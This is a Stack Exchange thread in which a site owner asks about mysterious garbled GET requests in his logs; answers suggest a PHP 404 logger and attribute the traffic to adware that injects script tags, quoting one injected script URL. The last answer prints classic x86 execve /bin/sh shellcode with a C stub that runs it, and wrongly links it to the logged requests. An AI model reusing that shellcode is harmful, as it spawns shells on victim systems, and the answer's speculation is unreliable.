17

Starting around 3 weeks ago, my site started getting a lot of strange and recurring http requests from my users.

I'm familiar with malicious scans which happen on a daily basis, but these requests seems to be different, and I believe its some browser, extension or javascript malfunction somewhere, rather than anything malicious.

Heres a small sample of the request from one user (although it affects various user agents and users)

[22/Jul/2014:20:57:49 +0100] "GET /groups/%60%EF%BF%BD%18%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 723  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:20:58:11 +0100] "GET /members/%EF%BF%BD%EF%BF%BD%18%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 5176  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:20:58:45 +0100] "GET /%EF%BF%BD%EF%BF%BD%18%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 5345  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:20:59:18 +0100] "GET /groups/%EF%BF%BD%EF%BF%BD%18%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 723  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:20:59:41 +0100] "GET /groups/%EF%BF%BDi%19%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 723  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:00:06 +0100] "GET /%EF%BF%BDg%19%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 5008  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:00:30 +0100] "GET /%EF%BF%BDc%19%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 4991  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:01:35 +0100] "GET /%EF%BF%BD%EF%BF%BD%18%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 5167  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:03:08 +0100] "GET /%EF%BF%BD%EF%BF%BD%18%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 5129  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:04:35 +0100] "GET /groups/%EF%BF%BDj%19%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 723  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:05:21 +0100] "GET /%EF%BF%BDf%19%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 5271  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:07:01 +0100] "GET /groups/%EF%BF%BDc%19%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 723  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:12:44 +0100] "GET /P%EF%BF%BD%16%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 5161  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:13:04 +0100] "GET /%EF%BF%BDO%0F%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 5328  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:13:52 +0100] "GET /groups/0%EF%BF%BD%18%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 723  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:14:14 +0100] "GET /groups/%EF%BF%BD%EF%BF%BD%18%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 723  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:14:34 +0100] "GET /@%EF%BF%BD%16%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 5347  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:15:04 +0100] "GET /@%EF%BF%BD%16%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 4942  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:15:11 +0100] "GET /groups/%EF%BF%BD%18%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 723  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:16:05 +0100] "GET /p%EF%BF%BD%18%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 5020  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[23/Jul/2014:01:11:58 +0100] "GET /%EF%BF%BD%07%1B%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 4877  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"

Ive studied it in detail but drawing a blank. Heres what Ive concluded so far...

  • Most of these requests are coming from long term users who are logged into my site, and they all started sending them around the same time

  • I started logging the request method, and they are all standard http rather a malfunctioning XMLHttp call

  • I isolated a few users who seem to send them frequently, and started logging captured the HTML of the page I was sending them prior. I'm fairly confident there is nothing at all in my HTML which could be prompting their browser to generate these requests. My site and database are fully utf-8. Im also confident my site has not been compromised and I do not serve scripts or ads from third parties, other than Google Analytics.

  • They always contain %EF%BF%BD which is the encoded version of the hex representation (EF BF BD) of the bytes of the UTF-8 replacement character

  • The requests always contain GET params o, g, s, z

  • It doesnt happen for all users, and I cannot reproduce on a variety of Windows, Mac or Mobile browsers.

  • For certain users, as the user is browsing around my site, around 40% of the time it is followed up by one or more of these requests (which accesses the same directory as their previous valid request)

I'd love some help on this, maybe someone will look at the params and recognise what could be causing it

The possible explanations i can think of are:

  • Some jquery regression (yet they aren't ajax requests)
  • Some regression with google maps (cannot reproduce)
  • Maybe a popular browser extension which has suddenly started going haywire
Neurone
  • 103
  • 2
carpii
  • 223
  • 2
  • 8
  • We have been seeing this on a public production site. Our error logging captures all the details of the request so we can see that it's not from a logged-in user and highly unlikely that it's a user following a link from any of our web properties. I think it's a bot crawling for URL parsing vulnerabilities. – thom_nic Jul 24 '14 at 13:41
  • interesting, are the requests you're seeing of an identical form to mine or simply similar? In my case they are definitely from logged in users, apart from the odd stray request although they are usually send one request and no more. For the users I am now suspecting it is malware based, but maybe there are a few bots trying it too. – carpii Jul 24 '14 at 19:32
  • They all look similar (but not identical) to this: `http://www.mysite.com/%EF%BF%BD?o=2&g=&s=&z=`. UA (if you believe it) is always reported as some version of IE - split between IE 7/9/10 and Win 7/8/Vista. – thom_nic Jul 28 '14 at 15:25
  • Wonder if it's an issue with charset conversion from ISO8859-1 to UTF-8? http://codingrigour.wordpress.com/2011/02/17/the-case-of-the-mysterious-characters/ – thom_nic Jul 28 '14 at 15:32
  • @thom_nic Thanks, thats interesting. I think I will just put it down to a clientside issue. Its strange that it has suddenly started happening in the past month or so, prior to that.. nothing – carpii Jul 28 '14 at 22:17
  • @thom_nic I did consider charset, it has that sort of feel about it especially with the 'unprintable' character. But the occasional request has a @ prefix like /@%EF%BF%BD too. Im confident my site is fully UTF and theres no urls I could be passing back in this form (I dont use those get params either) – carpii Jul 28 '14 at 22:19
  • I have very similar here: http://stackoverflow.com/questions/25222973/weird-characters-in-url/ This issue happens in our loggedin human users. I suppose there exists a virus or a malicious browser extension that causes this. – trante Aug 26 '14 at 06:31
  • @carpii, out of interest, did you ever get to the bottom of this issue? Perhaps you could create an answer with what you found, how you fixed it, etc. – Chris Murray Aug 26 '14 at 15:30
  • Are these requests always from Windows User Agents? Your question and the stackoverflow question both only list windows user agents (from Chrome, Firefox, and IE11). – dr jimbob Aug 26 '14 at 17:20
  • @ChrisMurray I never got to understand it fully, and its still an ongoing 'issue'. I've ruled out any changes to my site which is causing it, which I guess only leaves 1) Clientside malware 2) A misbehaving browser extension 3) Possibly ISP parental control or filtering doing something strange. – carpii Aug 27 '14 at 09:24
  • @drjimbob No Im seeing a wide range of user agents and platforms. The log was just a small section from one user, which is why its entirely Windows – carpii Aug 27 '14 at 09:25
  • At nk.pl we observe 45k requests matching 'o=3&g=&s=&z=' daily, from 763 distinct users, 286 distinct UA strings, and 19335 distinct URLs. I can provide more details, but no explanation :( – qbolec Sep 25 '14 at 10:29
  • I'm still seeing them daily too. Its hugely annoying, but also surprising that I still cant find any malware via Google which operates like this. Thanks for the update though, at least Im not alone :) – carpii Sep 26 '14 at 10:44
  • Russians: http://www.instructables.com/answers/What-causes-these-strange-characters-to-appear/ – j0h Sep 26 '14 at 15:41
  • @j0h, thanks but this is not the same issue. – carpii Sep 27 '14 at 12:31

3 Answers3

4

Since all the requests fail with the "404 Not Found" status, try to create a custom 404 error page that will log everything (all headers, the request, the user's session) and debug this, see if the actual requests come from just a few users with a busted web browser (virus, trojan etc. on the client machine), from all the users, just from users that are logged into your website or someone trying to launch some attacks to target your application.

If it's a problem on the client's side, there's not much you can do except track this and make sure it's not affecting your application.

On the other hand, if it's a problem on your side (server or application), this should give you at least something to analyze some starting points in fixing the issue.

Here's some basic custom 404 that does this:

<?php
/**
 * File: CustomError404.php
 * Custom 404 error page
 */

// Set the proper headers
if (!function_exists('http_response_code')) {
    header($_SERVER["SERVER_PROTOCOL"]." 404 Not Found");
    header("Status: 404 Not Found");
} else {
    http_response_code(404);
}

// Log whatever here...
$logMessage  = '**************************************************************' . PHP_EOL;
$logMessage .= '** Full request log - ' . date('Y-m-d H:i:s') . PHP_EOL;
$logMessage .= '**************************************************************' . PHP_EOL;
$logMessage .= "ALL HEADERS: " . PHP_EOL . print_r(getallheaders(), true);
$logMessage .= "REQUEST: " . PHP_EOL . print_r($_REQUEST, true);
$logMessage .= "SESSION: " . PHP_EOL . print_r($_SESSION, true);
$logMessage .= '**************************************************************' . PHP_EOL . PHP_EOL;

// Write the log to a file
$logFile = __DIR__ . '/req_error.log';
file_put_contents($logFile, $logMessage, FILE_APPEND);

// Display a message instead of a blank page
echo "<h1>404 Not Found</h1>";
echo "The page that you have requested could not be found.";
exit();

/* EOF */

To use it, simply upload this file to your application's root folder and put the following line in your virtual host or .htaccess configuration:

ErrorDocument 404 /CustomError404.php

You could customize this script even further and try to filter through and log just he requests with the specific characteristics you're interested in - this way you will just get what you're looking for in the log file, without having to filter through tons of extra "good" requests.

Thyamarkos
  • 171
  • 1
  • 3
  • Thanks, but I;ve logged this already but am not able to tell much from the actual requests themselves. I already have a custom http log format which allows me to log the userid into the raw logs, so Im able to see that its affecting a wide range of users on different browsers. – carpii Jul 23 '14 at 21:36
  • @carpii well, have you tracked HTTP_REFERRER? I have had similar links where a "smart redirect" entered a recursive loop that kept appending the same information to the get because it failed to parse the old get correctly. – guest Jul 23 '14 at 22:08
  • Hi, yes I do track referrer. What typically happens is they request a (valid) page from my site, and then this is followed up by the rogue request, with the valid page as the referrer. This would normally lead to the conclusion that there is something on that page causing the rogue requests, however I'm confident this isnt the case, and in some cases the user requests the same identical twice, yet only one of them cause a rogue request. Its very strange :( – carpii Jul 23 '14 at 23:24
  • 1
    This actually looks a lot like someone tried to inject some extra code in your website - maybe your server got hacked or someone managed to get in via some XSS or SQL injection. If you have any sort of backup or version control system on your production server, try and get a copy of the files from before this issue started to occur and do a diff with the current version of the files. Pay close attention to any JS code, especially obfuscated javascript with lots of base64 characters, and to your embedded images (again, see if you have any base64 funny-looking strings in your code). – Thyamarkos Jul 24 '14 at 00:52
  • good idea. My codebase is git backed and firewalled to me via knockd. Ive checked git and also compared md5 checksums of all files with my local repo, and no difference. But youve reminded me to check php.ini and config too. I guess its concievable that something could be placed outside the repo, and included via a compromised config (auto_prepend in php.inietc), however unlikely it seems at the moment – carpii Jul 24 '14 at 04:14
  • Just to confirm (since Ive now added a bounty), there were no git or php config issues causing this. – carpii Sep 27 '14 at 12:32
4

These requests are caused by Adware:Win32/Adpeak malfunctioning (yeah, believe it or not, even malware can malfunction).

It sets up a proxy server on the infected systems that injects script tags in all HTML content that passes through it, similar to

<script type="text/javascript" id="2f2a695a6afce2c2d833c706cd677a8e" src="http://d.lqw.me/xuiow/?g=750C2C5B-CF42-6996-0E5A-306165564128&s=F5D333A8-C748-4686-AE0A-9E008F670C22&z=1384886096"></script>

Under some specific circumstances the values of host name and the GET parameters can get corrupt and that's when you see requests like what OP posted 404'ing in your logs.

Read more in the related thread on SO.

antichris
  • 156
  • 2
  • You are awesome! Ive been tearing my hair out for weeks about this, wondering what could be causing it. Thanks so much :-) – carpii Nov 01 '14 at 22:19
0

makes me remember this:

char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

void main() {
   int *ret;

   ret = (int *)&ret + 2;
   (*ret) = (int)shellcode;
}

i think there's some fishy machines that are trying to execute shellcode in your website.

H3lp3ingth3p33ps
  • 343
  • 1
  • 2
  • 12